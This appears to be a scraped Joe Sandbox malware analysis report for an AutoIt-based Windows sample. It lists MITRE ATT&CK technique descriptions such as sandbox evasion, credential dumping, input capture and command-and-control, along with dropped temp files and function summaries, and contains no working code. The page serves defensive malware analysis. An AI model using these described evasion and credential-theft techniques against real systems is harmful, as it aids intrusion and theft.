Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\aut6E13.tmp

C:\Users\user\AppData\Local\Temp\aut6E72.tmp

C:\Users\user\AppData\Local\Temp\cerecloths

C:\Users\user\AppData\Local\Temp\windigos

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Function 00963B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00964AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00964FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 009C93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00963015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00963041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 009671EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00963A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00963633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00963778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 03E92640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 009639E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 03E92410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre